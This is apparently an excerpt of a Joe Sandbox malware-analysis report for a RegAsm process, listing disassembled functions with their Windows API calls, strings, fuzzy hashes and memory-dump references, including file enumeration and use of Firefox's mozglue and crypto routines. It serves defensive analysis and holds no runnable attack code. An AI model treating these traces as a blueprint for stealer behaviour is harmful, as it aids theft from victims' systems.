Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C526C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C526CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C526D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C526D26

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C526D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C526D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C526D73
free.MOZGLUE(00000000), ref: 6C526D80
CertGetNameStringW.CRYPT32 ref: 6C526DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C526DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C526DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C526DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C526E10
CryptMsgClose.CRYPT32(00000000), ref: 6C526E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C526E34
CreateFileW.KERNEL32 ref: 6C526EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C526F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C526F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C52709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C527103
free.MOZGLUE(00000000), ref: 6C527153
CloseHandle.KERNEL32(?), ref: 6C527176
__Init_thread_footer.LIBCMT ref: 6C527209
__Init_thread_footer.LIBCMT ref: 6C52723A
__Init_thread_footer.LIBCMT ref: 6C52726B
__Init_thread_footer.LIBCMT ref: 6C52729C
__Init_thread_footer.LIBCMT ref: 6C5272DC
__Init_thread_footer.LIBCMT ref: 6C52730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C5273C2
VerSetConditionMask.NTDLL ref: 6C5273F3
VerSetConditionMask.NTDLL ref: 6C5273FF
VerSetConditionMask.NTDLL ref: 6C527406
VerSetConditionMask.NTDLL ref: 6C52740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C52741A
moz_xmalloc.MOZGLUE(?), ref: 6C52755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C527568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C527585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C527598
free.MOZGLUE(00000000), ref: 6C5275AC

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6C5272C8
SHA256, xrefs: 6C526EC0
wintrust.dll, xrefs: 6C5272CD
(, xrefs: 6C52768A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: a53c46ad3318719896d985a8b8d81e1424a549b7f3454753736f97a7e477251c
Instruction ID: bfe0fb9552049316f62ed381cfa692b61a9d977eb656fc0391e67682251a9443
Opcode Fuzzy Hash: a53c46ad3318719896d985a8b8d81e1424a549b7f3454753736f97a7e477251c
Instruction Fuzzy Hash: 3652C371A003559BEB21DF24CC84BAA77F8FF85704F1145D9E909A7680DB74AE84CF91

Function 6C55F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C55F09B

Part of subcall function 6C535B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5356EE,?,00000001), ref: 6C535B85
Part of subcall function 6C535B50: EnterCriticalSection.KERNEL32(6C59F688,?,?,?,6C5356EE,?,00000001), ref: 6C535B90
Part of subcall function 6C535B50: LeaveCriticalSection.KERNEL32(6C59F688,?,?,?,6C5356EE,?,00000001), ref: 6C535BD8
Part of subcall function 6C535B50: GetTickCount64.KERNEL32 ref: 6C535BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C55F0AC

Part of subcall function 6C535C50: GetTickCount64.KERNEL32 ref: 6C535D40
Part of subcall function 6C535C50: EnterCriticalSection.KERNEL32(6C59F688), ref: 6C535D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C55F0BE

Part of subcall function 6C535C50: __aulldiv.LIBCMT ref: 6C535DB4
Part of subcall function 6C535C50: LeaveCriticalSection.KERNEL32(6C59F688), ref: 6C535DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C55F155
GetCurrentThreadId.KERNEL32 ref: 6C55F1E0
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F1ED
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F212
GetCurrentThreadId.KERNEL32 ref: 6C55F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C55F248
GetCurrentThreadId.KERNEL32 ref: 6C55F2AE
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F2BB
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F2F8

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55F350
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F35D
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F381
GetCurrentThreadId.KERNEL32 ref: 6C55F398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F3A0
GetCurrentThreadId.KERNEL32 ref: 6C55F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F491

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C55F3CF

Part of subcall function 6C55F070: GetCurrentThreadId.KERNEL32 ref: 6C55F440
Part of subcall function 6C55F070: AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F44D
Part of subcall function 6C55F070: ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C55F4A8
GetCurrentThreadId.KERNEL32 ref: 6C55F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F561
GetCurrentThreadId.KERNEL32 ref: 6C55F577
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F585
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C55F239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C55F56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C55F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C55F3A8

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: f81961ea4a0e002ac09429c360682c5cd9a58e8f2edd0ad88ff578e9aa22c1f4
Instruction ID: 2ce6b9faa2954041d55d961dfafcd0c65cefb5b1c78b21718d2f68c31a8c893a
Opcode Fuzzy Hash: f81961ea4a0e002ac09429c360682c5cd9a58e8f2edd0ad88ff578e9aa22c1f4
Instruction Fuzzy Hash: ACD11771604280DFDB10EF64CC047AA77F9EB86328F53479AF95983B81DB715818C7AA

Function 6C5264C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C5264DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C5264F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C526505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C526518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C52652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C52671C
GetCurrentProcess.KERNEL32 ref: 6C526724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C52672F
GetCurrentProcess.KERNEL32 ref: 6C526759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C526764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C526A80
GetSystemInfo.KERNEL32(?), ref: 6C526ABE
__Init_thread_footer.LIBCMT ref: 6C526AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C526AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C526AF7

Strings

detoured.dll, xrefs: 6C5264DA
nvd3d9wrap.dll, xrefs: 6C526500
_etoured.dll, xrefs: 6C5264ED
user32.dll, xrefs: 6C526526
nvdxgiwrap.dll, xrefs: 6C526513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C526798

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: c5ad6bd42dd6005b5d69c949d498155bffd6fe0dfd43ecde068343bbf998c27e
Instruction ID: 04263182f86f23b20d246f0781124ede928d582e4ddece8d86cd2d570a03486e
Opcode Fuzzy Hash: c5ad6bd42dd6005b5d69c949d498155bffd6fe0dfd43ecde068343bbf998c27e
Instruction Fuzzy Hash: AFF1CF709013699FDB20DF24CC48B9AB7F5EF46318F1542D9D809A3681EB35AE84CF91

Function 6C55E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6C55E2A6), ref: 6C55E35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C55E2A6), ref: 6C55E386
GetCurrentThreadId.KERNEL32 ref: 6C55E3E4
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6C55E4AB
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55E4F5
GetCurrentThreadId.KERNEL32 ref: 6C55E577
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55E584
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C55E8A6

Part of subcall function 6C51B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C51B7CF
Part of subcall function 6C51B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C51B808

Part of subcall function 6C56B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C590FB6,00000000,?,?,6C55E69E), ref: 6C56B830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6C55E6DA

Part of subcall function 6C56B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C56B916
Part of subcall function 6C56B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C56B94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C55E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C55E883

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C55E5A1, 6C55E5CC, 6C55E5FF, 6C55E62A
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C55E826, 6C55E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C55E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C55E722, 6C55E750, 6C55E7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C55E777

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: 1d8f4245945d5a5180adcdb74a0d06273ee7e6536665364e2f79b6227fede49a
Instruction ID: 9b79638a4e4a89871398abd922d44d682bd16270fcbd228226c56bb024900dac
Opcode Fuzzy Hash: 1d8f4245945d5a5180adcdb74a0d06273ee7e6536665364e2f79b6227fede49a
Instruction Fuzzy Hash: C802CE71600345DFCB10DF28C880A6AB7F5FF89308F52496DE89A87B51EB74E954CB91

Function 00415B0B Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 179stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
HeapAlloc.KERNEL32(00000000), ref: 00415B37
wsprintfA.USER32 ref: 00415B50
FindFirstFileA.KERNEL32(?,?), ref: 00415B67
StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
wsprintfA.USER32 ref: 00415BC9

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 0041580D: _memset.LIBCMT ref: 00415845
Part of subcall function 0041580D: _memset.LIBCMT ref: 00415856
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
Part of subcall function 0041580D: StrStrA.SHLWAPI(00000000), ref: 0041596A

FindNextFileA.KERNEL32(?,?), ref: 00415CD8
FindClose.KERNEL32(?), ref: 00415CEC
lstrcatA.KERNEL32(?), ref: 00415D1A
lstrcatA.KERNEL32(?), ref: 00415D2D
lstrlenA.KERNEL32(?), ref: 00415D39
lstrlenA.KERNEL32(?), ref: 00415D56

Strings

%s\*, xrefs: 00415B4A
%s\%s, xrefs: 00415BC3
K_A, xrefs: 00415DE8

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
